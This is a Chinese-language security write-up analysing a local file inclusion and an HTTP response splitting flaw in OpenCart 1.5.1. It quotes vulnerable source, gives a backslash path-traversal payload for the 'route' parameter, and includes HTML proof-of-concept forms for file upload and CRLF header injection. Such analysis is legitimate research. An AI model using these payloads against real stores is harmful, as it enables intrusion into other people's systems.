Opencart多漏洞解析

Opencart本地包含漏洞分析 作者:单恋一支花  from dis9 team 漏洞编号:http://www.exploit-db.com/exploits/17108/ 测试版本:opencart_v1.5.1 测试系统:windows xp sp3 效果如图: 分析: 一:本地包含漏洞 Index.php文件225行   // Router if (isset($request->get['route'])) {        $action = new Action($request->get['route']); } else {        $action = new Action('common/home'); } 很显然route是属于action这个对象的,在index.php中被实例化! 下面我们来看aciton.php              public function __construct($route, $args = array()) {               $path = '';               $parts = explode('/', str_replace('../', '', (string)$route));第一次过滤               foreach ($parts as $part) {                      $path .= $part;                      if (is_dir(DIR_APPLICATION . 'controller/' . $path)) {                             $path .= '/';                             array_shift($parts);                             continue;                      }                      if (is_file(DIR_APPLICATION . 'controller/' . str_replace('../', '', $path) . '.php')) {                             $this->file = DIR_APPLICATION . 'controller/' . str_replace('../', '', $path) . '.php';第二次过滤                             $this->class = 'Controller' . preg_replace('/[^a-zA-Z0-9]/', '', $path);                               array_shift($parts);                             break;                      }               }               if ($args) {                      $this->args = $args;               }               $method = array_shift($parts);               if ($method) {                      $this->method = $method;               } else {                      $this->method = 'index';               }        } route提交字符串经过了两次过滤,每次都是用空来替换字符串中的“../”,但是由于在windows平台下“/”“\”都可以用来做目录的跳转,所以我们可以用“\”来绕过过滤!linux平台下可以用n个“./”,或者00%截断,有兴趣的朋友可以尝试下! 测试方法: 在admin目录下建立一个1.php的文件,提交index.php?route=..\..\admin\1!   我们可以包含上传! Poc1: <html><body><center> <form action="http://127.0.0.1/opencart_v1.5.1/upload/index.php?route=product/product/upload" method="post" enctype="multipart/form-data"> <input type="file" name="file"> <input type="submit" value="test"> </form> </center></body></html> 效果如图 但是上传是随机加上md5命名的,没法利用,如果知道利用方法的朋友,还望不吝赐教!: upload\catalog\controller\product\product.php  551行 文件命名为                  $file = basename($this->request->files['file']['name']) . '.' . md5(rand()); 在windows平台下,我们还是可以通过穷举的方式,找到文件的(太菜了,笨办法),linux平台就没法子了,太多了!    二:http响应拆分漏洞    看代码:\system\library\url.php public function link($route, $args = '', $connection = 'NONSSL') {               if ($connection ==  'NONSSL') {                      $url = $this->url;                  } else {                      $url = $this->ssl;                   }               $url .= 'index.php?route=' . $route; \system\library\url.php   public function redirect($url) {          header('Location: ' . $url);          exit;   } url没有经过过滤直接代入重定向,造成http响应拆分漏洞! Poc2: <html><body><center> <form action="http://localhost/opencart_v1.5.1/upload/" method="post"> <input type="hidden" name="language_code" value="en"> <input type="hidden" name="redirect" value="?route=common/home&#013;&#010;foo=bar&#013;&#010;"> <input type="submit" value="test"> </form> </center></body></html>   测试返回:Warning: Header may not contain more than a single header, new line detected. in D:\wamp\www\opencart_v1.5.1\upload\system\engine\controller.php on line 29

除非特别注明,本站所有文字均为原创文章,作者:matrix